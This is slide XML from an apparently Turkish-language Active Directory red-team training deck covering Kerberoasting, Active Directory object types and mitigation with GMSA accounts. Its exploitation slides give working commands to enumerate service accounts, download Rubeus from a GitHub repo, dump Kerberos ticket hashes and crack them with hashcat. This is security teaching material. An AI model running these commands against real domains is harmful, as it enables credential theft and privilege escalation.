          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sayede</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>servisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yöneten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parolası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geçirebilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Eğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tanımlanmışsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>saldırgan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>otomatikman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yükseltmiş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olacaktır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yöntemi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>adlandırılmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder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1796092-37AA-A325-DD9F-CC13F8D861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2575021"/>
            <a:ext cx="5181600" cy="18524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38095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ABCE0-6C79-A3C4-41A6-16577A2D5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TTP 0x6 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Exploitation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C6501-0FE1-E082-2F8B-71A4832B1B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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Kerberoastable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Kullanıcıların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Neo4j </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sorgusu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tespit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>edilmesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>MATCH (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>u:User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hasspn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: true}) RETURN u </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Kerberoastable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Kullanıcıların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tespit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>edilmesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ADUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> -Filter {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>serviceprincipalname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> -like "*"} -Properties </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>serviceprincipalname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> | Format-Table </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t># Rubeus.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>aracı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>eğitim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>reposundan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>indiriliyor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>iwr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> -Uri https://github.com/forestallio/ActiveDirectoryRedTeaming/raw/main/Rubeus.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>OutFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Rubeus.exe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Kerberoastable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bilgisinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>elde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>edilmesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.\Rubeus.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kerberoast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> /user: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>outfile:hash.txt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03285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1DDC8-FD7B-49AC-E191-61F0AE21A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 err="1"/>
              <a:t>Mantıksal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Birimler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Obje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Türleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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49C44A0-A70E-0978-7163-F4E5DC42AB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sz="1800" dirty="0" err="1"/>
              <a:t>Kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> (User): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Çalışanların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kurum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bünyesinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bilgisayarlara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sunuculara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, e-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>posta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sistemine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>diğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>servislere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>oturum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>açarken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullandıkları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>hesaplardır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>hesapları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>çalışanlara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tanımlandığı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>gibi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>servisler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tanımlanabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. Bu tip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanıcılar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>otomatize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şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>çalışmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ortamına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>dahil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bilgisayarlara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bilgilerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tutulduğu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objelerdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>hesaplar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> da Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ortamında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>otomatize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şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>oturum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>açmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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7F4122-22CE-E7B9-CF9B-7F8695E41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925" y="1965198"/>
            <a:ext cx="5181600" cy="29276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98082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71F3B-FD1A-65FB-975B-AFF48FBD4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TTP 0x6 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Exploitation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54F3ED-DDB0-A813-26B1-DB224A259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8458" y="1412281"/>
            <a:ext cx="8335083" cy="46884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86395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15654-4C96-961E-6E45-7C4300787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TTP 0x6 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Exploitation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1AEA1-42F0-D69D-90B9-CEB66CAE8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# Hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>değerinin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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HashCat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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ile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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kırılması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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -m 13100 -a 0 hash.txt path/to/wordlist/rockyou.txt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181F50-44F1-DBA8-7A7F-19952A29C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559" y="2657475"/>
            <a:ext cx="7318881" cy="329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2344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69098-C6F7-CC5E-7F7A-B76381A83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TTP 0x6 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Mitigation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B5546-22E7-7617-27AD-D980BE7C0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Servisler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yönetilirken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> normal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hesaplar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yerine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> GMSA (Group Managed Service Account) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ismi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>verilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>özel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hesaplar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanılmalıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hesapların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parolaları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>otomatize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şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>karmaşık</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>belirlenmekte</a:t>
            </a:r>
            <a:r>
